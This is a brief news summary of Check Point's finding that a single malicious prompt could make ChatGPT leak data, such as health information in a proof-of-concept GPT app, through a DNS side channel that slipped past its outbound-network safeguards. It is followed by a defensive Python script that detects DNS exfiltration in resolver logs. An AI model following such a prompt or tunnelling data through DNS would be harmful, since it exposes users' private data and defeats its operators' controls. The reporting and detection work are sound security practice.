OpenAI touts robust data security for its AI offerings, but Check Point has uncovered vulnerabilities in ChatGPT that previously allowed data leaks via a DNS side channel. In February, OpenAI resolved a significant flaw that had enabled a single malicious prompt to exploit an exfiltration channel hidden within ChatGPT interactions. Check Point's researchers revealed that while OpenAI implemented various safeguards against direct outbound network requests, it overlooked DNS data transmission, creating a security loophole. The researchers demonstrated potential exploitation through proof-of-concept attacks, including a GPT-enabled app that analyzed personal health data and unknowingly transmitted sensitive information to an external server. Such vulnerabilities raise concerns for industries governed by strict regulations, since a data breach in a corporate AI service could lead to GDPR or HIPAA violations. OpenAI addressed this issue on February 20, 2023, yet the incident highlights the ongoing challenges of AI data security.
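One way to monitor for the gap described above, where HTTP egress is blocked but DNS resolution is not, is to review the sandbox's resolver logs. This is an added example, not code from Check Point or OpenAI; it assumes the data travels in long, high-entropy subdomain labels (the article does not say how it was encoded), and the log format, hostnames and thresholds are constructed for illustration.

```python
import math
from collections import Counter, defaultdict

# Constructed resolver log: "<timestamp> <client> <query name>"
SAMPLE_LOG = """\
2024-01-01T10:00:01Z sandbox-7 pypi.org
2024-01-01T10:00:02Z sandbox-7 files.pythonhosted.org
2024-01-01T10:00:05Z sandbox-7 nbxw4zlomqqgc3tfonzq.c1.collector.example
2024-01-01T10:00:05Z sandbox-7 mfzwk4tjnzxxe3lbnruw.c2.collector.example
2024-01-01T10:00:06Z sandbox-7 oqqhi2dfebzxizlboruw.c3.collector.example
2024-01-01T10:00:06Z sandbox-7 4zzanfxgo2lomuqgk3tf.c4.collector.example
2024-01-01T10:00:09Z sandbox-7 api.github.com
"""

def entropy(text):
    """Shannon entropy of a string, in bits per character."""
    counts = Counter(text)
    return -sum(n / len(text) * math.log2(n / len(text)) for n in counts.values())

def parse(log):
    """Yield (client, query name) pairs, skipping malformed lines."""
    for line in log.splitlines():
        parts = line.split()
        if len(parts) == 3:
            yield parts[1], parts[2].lower().rstrip(".")

def suspicious_zones(log, min_queries=3, min_len=16, min_entropy=3.0):
    """Return {(client, zone): count} for zones receiving many distinct,
    long, random-looking subdomains from one client."""
    per_zone = defaultdict(set)
    for client, qname in parse(log):
        labels = qname.split(".")
        if len(labels) < 3:
            continue  # no subdomain part that could carry data
        # Assumption: zone = last two labels; production code would
        # consult the Public Suffix List instead.
        per_zone[(client, ".".join(labels[-2:]))].add(".".join(labels[:-2]))
    findings = {}
    for key, subs in per_zone.items():
        odd = [s for s in subs
               if len(s) >= min_len and entropy(s.replace(".", "")) >= min_entropy]
        if len(odd) >= min_queries:
            findings[key] = len(odd)
    return findings

if __name__ == "__main__":
    for (client, zone), n in suspicious_zones(SAMPLE_LOG).items():
        print(f"{client}: {n} high-entropy subdomains under {zone}")
```

The thresholds need tuning against a baseline of normal sandbox traffic, since CDN and telemetry hostnames can also look random.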
